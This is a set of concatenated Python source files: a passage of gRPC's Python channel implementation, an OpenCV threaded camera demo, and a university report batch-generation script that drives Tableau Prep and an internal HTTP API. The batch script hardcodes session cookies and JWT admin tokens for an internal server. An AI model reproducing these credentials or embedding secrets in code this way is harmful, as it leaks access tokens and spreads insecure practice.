cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else
credentials._credentials, operationses,
_event_handler(state,
self._response_deserializer), self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
|
demo_oop.py
|
# object oriented programming + single thread
# single thread created by user - basic building block for multiple thread system
# 1 thread - acquire image from camera and show it
# see demo_multithread.py for a more complete version
# multithread demo
# https://nrsyed.com/2018/07/05/multithreading-with-opencv-python-to-improve-video-processing-performance/
import numpy as np
from threading import Thread
import cv2
from datetime import datetime
class VideoGet:
"""
Class that continuously gets frames from a VideoCapture object
with a dedicated thread.
"""
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
while not self.stopped:
if not self.grabbed:
self.stop()
else:
(self.grabbed, self.frame) = self.stream.read()
print( self.stream.get(cv2.CAP_PROP_FPS) )
def stop(self):
self.stopped = True
def threadVideoGet(source=0):
"""
Dedicated thread for grabbing video frames with VideoGet object.
Main thread shows video frames.
"""
video_getter = VideoGet(source).start()
while True:
if (cv2.waitKey(1) == ord("q")) or video_getter.stopped:
video_getter.stop()
break
frame = video_getter.frame
cv2.imshow("Video", frame)
if __name__ == '__main__':
threadVideoGet()
|
batchrefresh.py
|
# -*- coding: utf-8 -*-
import decorator
import sys
import os
import queue
import logging
import copy
import threading
import fileexport
import publish
import httpinvoke
from majorcollege2dict import majorcollege2dict
import util
"""Main module."""
logger=util.create_logger(logging.INFO,__name__)
back_logger=util.create_logger(logging.INFO,'back_logger')
college_report_config={
# 该目录下每个子目录名称为学院名
'source-base-path': r'E:\newjincin\projects\ros\doc\18届数据\分院系',
'exportconfig':{
"exportlist": [
{
'from': r'e:\newjincin\projects\ros\doc\16届数据\分院系\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\16届数据\分院系',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\17届数据\分院系\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\17届数据\分院系',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\18届数据\分院系\{}',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\18届数据\分院系',
'type': 'directory'
}
],
},
'college_alias':{"传媒学院": ['凤凰传媒学院'],
"轨道交通学院":['城市轨道交通学院']
},#学院改名
'prep_cli_path':r'"D:\Program Files\Tableau\TableauPrepBuilder2019\scripts\tableau-prep-cli.bat" -c "{}" -t "{}"',
'tfl_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\学院\学院.tfl',
'flow_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\学院\flow.json',
'http_config':{
'generate_url':'http://10.10.3.225:19700/v1/planProcessInfo/generatePlanWord',
#planId(方案id)必填,报告名由学院名+报告+yyyy-MM-dd组成
'generate_param':{"planId":"27","generateName":""},
'searchstatus_url':'http://10.10.3.225:19700/v1/planProcessInfo/getByUser/{}',
'download_url':'http://10.10.3.225:19700/v1/planProcessInfo/downloadPlanWord',
'download_param':{"planProcessInfoId":"{}"},
'download_filename':r'e:\newjincin\projects\ros\doc\refresh\output\分学院\{}.docx',
'cookies':{
'Admin-Token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
'JSESSIONID':'F420351B4AD953795A66AC498B0FF18E',
'token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
}
},
#输出的报告类型配置,planid是使用的方案,reportname是生成报告的格式,{}用专业名称填充
'output_report_config':[
{
'planId':'48','reportname':'{}2018届本科毕业生社会需求与人才培养质量报告'
},
{
'planId':'51','reportname':'{}2016-2018届本科毕业生调研结果对比分析'
}
]
}
major_report_config={
# 该目录下每个子目录名称为专业名
'source-base-path': r'E:\newjincin\projects\ros\doc\18届数据\分专业',
'exportconfig':{
"exportlist": [
{
'from': r'e:\newjincin\projects\ros\doc\16届数据\分专业\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\16届数据\分专业',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\17届数据\分专业\{}\主数据源.xlsx',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\17届数据\分专业',
'type': 'file'
},
{
'from': r'E:\newjincin\projects\ros\doc\18届数据\分专业\{}',
'to': r'e:\newjincin\projects\ros\doc\refresh\datasource\18届数据\分专业',
'type': 'directory'
}
],
},
'major_alias':{},#专业改名
'prep_cli_path':r'"D:\Program Files\Tableau\TableauPrepBuilder2019\scripts\tableau-prep-cli.bat" -c "{}" -t "{}"',
'tfl_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\专业\专业.tfl',
'flow_path':r'e:\newjincin\projects\ros\doc\refresh\tfl\专业\flow.json',
'http_config':{
'generate_url':'http://10.10.3.225:19700/v1/planProcessInfo/generatePlanWord',
#planId(方案id)必填,报告名由学院名+报告+yyyy-MM-dd组成
'generate_param':{"planId":"27","generateName":""},
'searchstatus_url':'http://10.10.3.225:19700/v1/planProcessInfo/getByUser/{}',
'download_url':'http://10.10.3.225:19700/v1/planProcessInfo/downloadPlanWord',
'download_param':{"planProcessInfoId":"{}"},
'download_filename':r'e:\newjincin\projects\ros\doc\refresh\output\分专业\{}.docx',
'cookies':{
'Admin-Token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
'JSESSIONID':'F420351B4AD953795A66AC498B0FF18E',
'token':'eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJyb3MtbWFqb3IiLCJ1c2VySWQiOiI2ODI5MDMiLCJuYW1lIjoiUk9T5pON5L2c5Lq65ZGYIiwicm9sZXMiOlt7ImlkIjoyOSwiY29kZSI6bnVsbCwibmFtZSI6IlJPUyIsInN0YXR1cyI6bnVsbCwiY29sbGVnZUxpc3QiOm51bGwsIm1hbmFnZVNjb3BlTGlzdCI6bnVsbH1dLCJyb2xlVHlwZSI6IjAiLCJleHAiOjE1NTgwNzY2Mjh9.zY9gZZLuLTgUwIMmytMzTXDY79yhUc5xw6miNLRly9K19Haelw9ilpgwg24J6VY93j4fyIGmrmwKfr_UMI7tg9tMQwUlfrDhaKwQA6ll8lOgCafdEDrSe-h_rACT4j0kfaazxI3wl5w8HK3ka9MBtvPstkSa2hsTSDNkTaNFLMg',
}
},
#输出的报告类型配置,planid是使用的方案,reportname是生成报告的格式,{}用专业名称填充
'output_report_config':[
{
'planId':'39','reportname':'{}专业2018届本科毕业生社会需求与人才培养调研结果'
},
{
'planId':'50','reportname':'{}专业2016-2018届本科毕业生调研结果对比分析'
}
]
}
college_major_mapping_path=r'e:\newjincin\projects\ros\doc\refresh\datasource\18届数据\院系-专业对照表.xlsx'
def print_and_info(msg):
logger.info(msg)
print(msg)
def backlog(msg):
back_logger.info(msg)
#执行学院报告生成
'''
type=1 只生成学院报告 2只生成专业报告 3生成学院和专业报告
college_list 要处理的学院列表
major_list 要处理的专业列表
'''
@decorator.timing
def college_batch_generate(type):
# 设置任务队列
# 查找是否有未完成的队列文件,有则加载,无则初始化队列
# taskqueuename='first'
# exectype=0 # 0为新的执行任务 1为继续执行中断的任务
# taskqueuepath=r'c:\{}.txt'.format(taskqueuename)
# 读取配置文件
mapperObj=majorcollege2dict(college_major_mapping_path)
#获取学院子目录列表,加入到队列
#dirlist=os.listdir(college_report_config['source-base-path'])
dirlist=mapperObj.college_major_mapping()
print_and_info(dirlist)
#如果学院下的所有专业都完成了,删除该学院
delete_key_list=[]
for dirobj in dirlist:
completeCount=0
majorCount=len(dirlist[dirobj])
for major in dirlist[dirobj]:
if major['status']==1:
completeCount+=1
if completeCount==majorCount:
delete_key_list.append(dirobj)
print(delete_key_list)
for deleteitem in delete_key_list:
dirlist.pop(deleteitem)
print_and_info(dirlist)
taskqueue=queue.Queue()
noinqueue=[]#不生成的学院列表
#inqueue=['轨道交通学院']
#dirlist=inqueue
for onedir in dirlist:
if onedir not in noinqueue:
#if onedir in inqueue:
taskqueue.put(onedir)
print_and_info(onedir)
print(taskqueue)
print_and_info("------------------------")
while True:
if taskqueue.empty():
print_and_info('任务队列执行完毕!')
break
collegename=taskqueue.get()
if collegename is None:
break
#操作当前目录
print_and_info(collegename)
# 执行复制操作
fileexport.college_filecopy(collegename,college_report_config['exportconfig'],college_report_config['college_alias'])
# 执行脚本命令,发布数据源
cmdline=college_report_config['prep_cli_path'].format(
college_report_config['flow_path'],
college_report_config['tfl_path'])
publishresult=publish.exec_publish(cmdline)
if publishresult==False:
print_and_info("{}更新数据源失败".format(collegename))
backlog("{}更新数据源失败".format(collegename))
continue#一个学院更新失败后继续下一个学院
if type==1:#只生成学院报告
college_exec_generate_report(collegename,college_report_config['output_report_config'])
elif type==2:#只生成专业报告
for major_and_status in dirlist[collegename]:
majorname=major_and_status['major']
status=major_and_status['status']
if status==0:
major_generate(majorname,mapperObj,collegename)
else:#学院和专业都生成
college_exec_generate_report(collegename,college_report_config['output_report_config'])
for major_and_status in dirlist[collegename]:
majorname=major_and_status['major']
status=major_and_status['status']
if status==0:
major_generate(majorname,mapperObj,collegename)
print_and_info("------------------------")
print_and_info("执行完毕!")
#生成学院报告
@decorator.timing
def college_exec_generate_report(collegename,college_report_output_config):
# 生成线程
threads=[]
# 循环调用报告生成接口
for output_config in college_report_output_config:
reportid=output_config['planId']
reportname=output_config['reportname'].format(collegename)
reportconfig=copy.deepcopy(college_report_config['http_config'])
reportconfig['generate_param']['planId']=reportid
reportconfig['generate_param']['generateName']=reportname
workthread=threading.Thread(target=httpinvoke.wrap_generate_and_download_report,args=(reportconfig,))
threads.append(workthread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print_and_info('{}学院报告生成完毕!'.format(collegename))
def major_generate(majorname,mapperObj,collegename):
print_and_info('开始处理{}专业---'.format(majorname))
# 执行复制操作
fileexport.major_filecopy(majorname,major_report_config['exportconfig'])
# 执行脚本命令,发布数据源
cmdline=major_report_config['prep_cli_path'].format(
major_report_config['flow_path'],
major_report_config['tfl_path'])
publishresult=publish.exec_publish(cmdline)
if publishresult==False:
print_and_info("{}更新数据源失败".format(majorname))
backlog("{}更新数据源失败".format(majorname))
return
backlog("{}更新数据源成功".format(majorname))
# 生成线程
threads=[]
# 调用报告生成接口
for output_config in major_report_config['output_report_config']:
reportid=output_config['planId']
reportname=output_config['reportname'].format(majorname)
reportconfig=copy.deepcopy(major_report_config['http_config'])
reportconfig['generate_param']['planId']=reportid
reportconfig['generate_param']['generateName']=reportname
#下载报告到学院名的目录中,便于管理
downloadpath=reportconfig['download_filename']
split_path_list=os.path.split(downloadpath)
prepart=split_path_list[0]
afterpart=split_path_list[1]
reportconfig['download_filename']=prepart+'\\'+collegename+'\\'+afterpart
#新的下载路径如果不存在就新建一个
new_downloadpath=prepart+'\\'+collegename
if os.path.isdir(new_downloadpath)==False:
os.mkdir(new_downloadpath)
print('new path is '+new_downloadpath)
workthread=threading.Thread(target=httpinvoke.wrap_generate_and_download_report,args=(reportconfig,))
threads.append(workthread)
#httpinvoke.wrap_generate_and_download_report(reportconfig)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
#需要加异常管理
mapperObj.set_major_status(majorname,1)
print_and_info("------------------------")
print_and_info("执行完毕!")
def testdeletelist():
dirlist={'沙钢钢铁学院': [{'major': '冶金工程', 'status': 1}, {'major': '金属材料工程', 'status': 1}], '体育学院': [{'major': '武术与民族传统体育', 'status': 1}, {'major': '体育教育', 'status': 1}, {'major': '运动训练', 'status': 1}, {'major': '运动人体科学', 'status': 1}], '外国语学院': [{'major': '法语(法英双语)', 'status': 1}, {'major': '西班牙语', 'status': 1}, {'major': '日语', 'status': 1}, {'major': '翻译', 'status': 1}, {'major': '俄语(俄英双语)', 'status': 1}, {'major': '朝鲜语', 'status': 1}, {'major': '德语', 'status': 1}, {'major': '英语', 'status': 1}, {'major': '英语(师范)', 'status': 1}], '社会学院': [{'major': '历史学(师范)', 'status': 1}, {'major': '劳动与社会保障', 'status': 1}, {'major': '信息资源管理', 'status': 0}, {'major': '档案学', 'status': 0}, {'major': '旅游管理', 'status': 0}, {'major': '社会学', 'status': 0}], '文学院': [{'major': '汉语言文学', 'status': 0}, {'major': '汉语国际教育', 'status': 0}, {'major': '汉语言文学(基地)', 'status': 0}, {'major': '汉语言文学(师范)', 'status': 0}], '计算机科学与技术学院': [{'major': '信息管理与信息系统', 'status': 0}, {'major': '物联网工程', 'status': 0}, {'major': '软件工程(嵌入式软件人才培养)', 'status': 0}, {'major': '网络工程', 'status': 0}, {'major': '软件工程', 'status': 0}, {'major': '计算机科学与技术', 'status': 0}], '材料与化学化工学部': [{'major': '无机非金属材料工程', 'status': 0}, {'major': '化学工程与工艺', 'status': 0}, {'major': '应用化学', 'status': 0}, {'major': 